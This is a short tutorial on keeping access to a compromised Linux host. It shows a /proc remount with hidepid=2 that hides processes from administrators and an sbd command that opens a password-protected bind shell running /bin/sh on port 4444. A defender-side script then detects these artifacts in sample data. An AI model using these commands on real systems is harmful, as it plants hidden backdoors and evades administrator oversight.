Maintaining Access With sbd

sbd is a program similar to netcat that allows one to read from and write to TCP sockets. sbd is fully portable and is available for Windows and Unix/Linux operating systems.

In this post I will show how, after gaining privileged access to a system, one can maintain access using sbd. I will also illustrate some of the pitfalls of using tools like sbd.

After compromising an account that has sudo rights, remount the proc file system as follows:

sudo mount -o remount,rw,hidepid=2 /proc
 
This command remounts the proc file system with hidepid=2, which prevents users from accessing the /proc/PID entries of processes they do not own. This hides all processes from users except their own. An unobservant administrator may not notice this at first when logging in under their own account.

Note that this option is only available under Linux kernels 3.2 and later. Also, root will still be able to see all processes.

Next, run sbd. An example of possible options is:

sbd -l -c on -k password -vv -n -e /bin/sh -p 4444

-c on : encryption on
-k password : enable password authentication where password is the password
-vv : verbose
-n : disable name resolution
-e : execute program on connection
-p port : listen on port
-l : listen for connections

As the following examples show, the process is hidden from the non-privileged user, but the ss command still shows the host is listening on port 4444.

[Screenshots: the process list as seen by a non-privileged user, and ss output showing a listener on port 4444]

From the other host you can initiate the connection as follows:

[Screenshot: the sbd client connecting from the other host]
This method of maintaining access is simple but not very robust as sbd can still be discovered via the netstat and ss commands.  Also, note that a bind shell was used in this example, so the port used must be opened on any firewalls.  A reverse shell would be better suited for this case.
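The detection side of the caveats above, as an added example that is not part of the original post: a POSIX shell script that checks for the three artifacts this technique leaves behind, a hidepid option on /proc, a listening port outside an allowlist, and the sudo log entry for the remount. The /proc/mounts lines, ss output, auth.log excerpt, port allowlist and user name are all constructed samples.

```shell
#!/bin/sh
# Added example (not from the original post): defender-side checks for the
# artifacts left by a hidepid remount and an sbd bind-shell listener.
# Every input below is a constructed sample standing in for live data.

# Constructed /proc/mounts lines after the remount shown in the post.
SAMPLE_MOUNTS='proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0'

# Constructed `ss -ltn` output; run as root, hidepid hides nothing from it.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:22        0.0.0.0:*
LISTEN 0      1      0.0.0.0:4444      0.0.0.0:*
LISTEN 0      128    [::]:22           [::]:*'

# Constructed auth.log excerpt: sudo records the remount command verbatim.
SAMPLE_AUTH='Jan 10 09:12:01 host sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/mount -o remount,rw,hidepid=2 /proc
Jan 10 09:12:44 host sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update'

# Print the hidepid= value set on /proc, or nothing if the option is absent.
proc_hidepid() {
    printf '%s\n' "$1" | awk '$2 == "/proc" {
        n = split($4, o, ",")
        for (i = 1; i <= n; i++) if (sub(/^hidepid=/, "", o[i])) print o[i]
    }'
}

# Print listening ports in `ss -ltn` output that are not in the
# space-separated allowlist $2 (e.g. "22 631"); IPv6 "[::]:22" is handled.
unexpected_listeners() {
    printf '%s\n' "$1" | awk -v allow=" $2 " 'NR > 1 && $1 == "LISTEN" {
        n = split($4, a, ":"); port = a[n]
        if (index(allow, " " port " ") == 0 && !seen[port]++) print port
    }'
}

# Print "user<TAB>command" for sudo entries that remount /proc with hidepid.
hidepid_remounts() {
    printf '%s\n' "$1" | awk -F' ; ' '/sudo:/ && /COMMAND=.*mount .*hidepid=/ {
        split($1, u, "sudo: "); sub(/ :.*$/, "", u[2])
        sub(/^COMMAND=/, "", $NF); print u[2] "\t" $NF
    }'
}

proc_hidepid "$SAMPLE_MOUNTS"
unexpected_listeners "$SAMPLE_SS" "22 631"
hidepid_remounts "$SAMPLE_AUTH"
```

On a live host, feed the functions `cat /proc/mounts`, `ss -ltn` and the sudo lines of the auth log instead of the samples.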
